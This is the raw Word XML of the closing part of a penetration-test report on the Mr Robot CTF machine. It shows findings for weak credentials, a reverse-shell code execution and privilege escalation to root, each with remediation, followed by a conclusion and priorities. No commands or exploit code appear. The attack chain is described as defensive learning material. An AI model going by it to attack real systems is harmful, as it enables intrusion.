                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>containing wordlists, credentials, or configuration details assist attackers in progressing through the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C3BBE4">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Remove unnecessary files, secure configuration files, and limit public access to sensitive directories.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0DA3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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="512" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D0CBC51">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4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FCA4A40">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Weak / Guessable Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09433985">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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C29E78B">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rPr>
              <w:t>Weak credentials enable unauthorized access to the WordPress admin panel, allowing content modification or malicious uploads.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> i.e account compromised and lateral movement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="387FBB3B">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Enforce strong password policies, enable MFA, and restrict admin access to trusted networks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2778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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="512" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B60AF8B">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5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30D7BB7D">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Remote Code Execution (Reverse Shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74CC08C6">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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66922B8F">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Exploiting the web application allows attackers to execute commands remotely and gain interactive shell access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50AEC0DC">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Patch vulnerable components, restrict file uploads, and harden server permissions to prevent code execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DB6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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="512" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32CCF9CE">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6.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2896" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ECFF5B3">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Privilege Escalation to Root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="997" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EB765D4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A775B28">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Attackers can escalate from a low‑privileged shell to full root access, resulting in total system compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1704" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7814E925">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:vertAlign w:val="baseline"/>
              </w:rPr>
              <w:t>Apply least‑privilege principles, patch privilege‑escalation vectors, and monitor for abnormal privilege use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58ED2E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3554F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="202BD522">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFFCA38">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D01CD25">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC41983">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7495E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5389DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F70D0C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69751537">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC48885">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The Mr Robot CTF environment, when viewed as an analogue for a real-world production system, demonstrates several critical weaknesses that could lead to complete system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47344652">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A376B95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The most severe issue identified was the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>local privilege escalation to root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> which, combined with initial web application weaknesses and weak credential management, enabled a full attack chain from unauthenticated external user to root-level control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4720A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34841C01">
      <w:pPr>
        <w:ind w:firstLine="120" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Recommended Priorities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED4555">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Address privilege escalation paths</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and remove unnecessary elevated binaries or misconfigurations.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9027D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Harden the web application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">removing exposed sensitive files and enforcing strict access controls.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664F0F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Improve credential hygiene</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, including strong passwords and secure storage practices.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243BA504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F766CBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>By addressing these issues in order of criticality, the overall security posture of a similar real-world environment would be significantly improved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3FF58">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7652A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="87A7652A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="955229AA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="955229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0777C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9D0777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A631857"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AA6318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4A2CD21"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B4A2CD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3F6D6D3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F3F6D6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7C3FA1A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="07C3FA1A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="5"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="15ADD7FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="15ADD7FF"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="326AF54A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="326AF5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3EABA20"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="63EABA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70356CB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="670356C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4"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>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D7AB5"/>
    <w:rsid w:val="02EC0C64"/>
    <w:rsid w:val="03082909"/>
    <w:rsid w:val="03557185"/>
    <w:rsid w:val="03BE6BB4"/>
    <w:rsid w:val="045203DF"/>
    <w:rsid w:val="05420F2F"/>
    <w:rsid w:val="07F76E9E"/>
    <w:rsid w:val="08F62644"/>
    <w:rsid w:val="0B506FA0"/>
    <w:rsid w:val="0BED101D"/>
    <w:rsid w:val="0D080870"/>
    <w:rsid w:val="0D8D654B"/>
    <w:rsid w:val="0E07368C"/>
    <w:rsid w:val="0E7F1356"/>
    <w:rsid w:val="0F386586"/>
    <w:rsid w:val="10274C2E"/>
    <w:rsid w:val="113F0EDA"/>
    <w:rsid w:val="11C55908"/>
    <w:rsid w:val="11F5739F"/>
    <w:rsid w:val="121B53C5"/>
    <w:rsid w:val="122A435A"/>
    <w:rsid w:val="12747FFD"/>
    <w:rsid w:val="144114C7"/>
    <w:rsid w:val="149F2C57"/>
    <w:rsid w:val="15724B79"/>
    <w:rsid w:val="160F204B"/>
    <w:rsid w:val="16D3700A"/>
    <w:rsid w:val="16FB589A"/>
    <w:rsid w:val="174F49CD"/>
    <w:rsid w:val="18CA54A8"/>
    <w:rsid w:val="19401B78"/>
    <w:rsid w:val="19561A3E"/>
    <w:rsid w:val="1A45271F"/>
    <w:rsid w:val="1B304628"/>
    <w:rsid w:val="1C7D282E"/>
    <w:rsid w:val="1C883072"/>
    <w:rsid w:val="1E4174FF"/>
    <w:rsid w:val="1F2F3CBF"/>
    <w:rsid w:val="1F8345C2"/>
    <w:rsid w:val="20BE134E"/>
    <w:rsid w:val="20D01E23"/>
    <w:rsid w:val="22193AE6"/>
    <w:rsid w:val="23042EFF"/>
    <w:rsid w:val="256D77A1"/>
    <w:rsid w:val="27AF3DC0"/>
    <w:rsid w:val="29C53567"/>
    <w:rsid w:val="2A781B3D"/>
    <w:rsid w:val="2B30030A"/>
    <w:rsid w:val="2DB46A8B"/>
    <w:rsid w:val="2F1D015B"/>
    <w:rsid w:val="2F83042E"/>
    <w:rsid w:val="32855FEF"/>
    <w:rsid w:val="33413A26"/>
    <w:rsid w:val="37E62C43"/>
    <w:rsid w:val="38704DA6"/>
    <w:rsid w:val="3910596B"/>
    <w:rsid w:val="3A7A647F"/>
    <w:rsid w:val="3AE56082"/>
    <w:rsid w:val="3AE71032"/>
    <w:rsid w:val="3C7B23D7"/>
    <w:rsid w:val="3EDA7CAE"/>
    <w:rsid w:val="417B6F7C"/>
    <w:rsid w:val="43521101"/>
    <w:rsid w:val="46E531DB"/>
    <w:rsid w:val="47943A58"/>
    <w:rsid w:val="48297DAD"/>
    <w:rsid w:val="4A423EE2"/>
    <w:rsid w:val="4ABA40A5"/>
    <w:rsid w:val="4AF22A01"/>
    <w:rsid w:val="4B3237EB"/>
    <w:rsid w:val="4DFD7AB5"/>
    <w:rsid w:val="4F6F15E1"/>
    <w:rsid w:val="50635672"/>
    <w:rsid w:val="50BF4786"/>
    <w:rsid w:val="51500843"/>
    <w:rsid w:val="54424159"/>
    <w:rsid w:val="54E51D72"/>
    <w:rsid w:val="567120DE"/>
    <w:rsid w:val="5A543612"/>
    <w:rsid w:val="5C457071"/>
    <w:rsid w:val="603246B6"/>
    <w:rsid w:val="6123116D"/>
    <w:rsid w:val="621C40C6"/>
    <w:rsid w:val="6239138B"/>
    <w:rsid w:val="634136E6"/>
    <w:rsid w:val="638A7E06"/>
    <w:rsid w:val="64DD52E9"/>
    <w:rsid w:val="65362D63"/>
    <w:rsid w:val="662621A5"/>
    <w:rsid w:val="66F81601"/>
    <w:rsid w:val="66FD53B0"/>
    <w:rsid w:val="681A2BD5"/>
    <w:rsid w:val="68220C34"/>
    <w:rsid w:val="68502514"/>
    <w:rsid w:val="69D64E39"/>
    <w:rsid w:val="6A8C58DC"/>
    <w:rsid w:val="6AE81025"/>
    <w:rsid w:val="6B2C0B46"/>
    <w:rsid w:val="6CD92F23"/>
    <w:rsid w:val="6E4A7901"/>
    <w:rsid w:val="6F734899"/>
    <w:rsid w:val="6FBE79D4"/>
    <w:rsid w:val="709E2354"/>
    <w:rsid w:val="71305E4A"/>
    <w:rsid w:val="71A66CD6"/>
    <w:rsid w:val="739D632F"/>
    <w:rsid w:val="73FD6860"/>
    <w:rsid w:val="744E5F5D"/>
    <w:rsid w:val="74792624"/>
    <w:rsid w:val="76A75027"/>
    <w:rsid w:val="779602E6"/>
    <w:rsid w:val="77AD2566"/>
    <w:rsid w:val="79F3459F"/>
    <w:rsid w:val="7EBC3E0F"/>
    <w:rsid w:val="7FF75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basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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967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2026-03-13T10:27:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>DELL</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-23T07:34:39Z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C0B32782BD674C0B8552A3E7625CDBDA_11</vt:lpwstr>
  </property>
</Properties>
</file>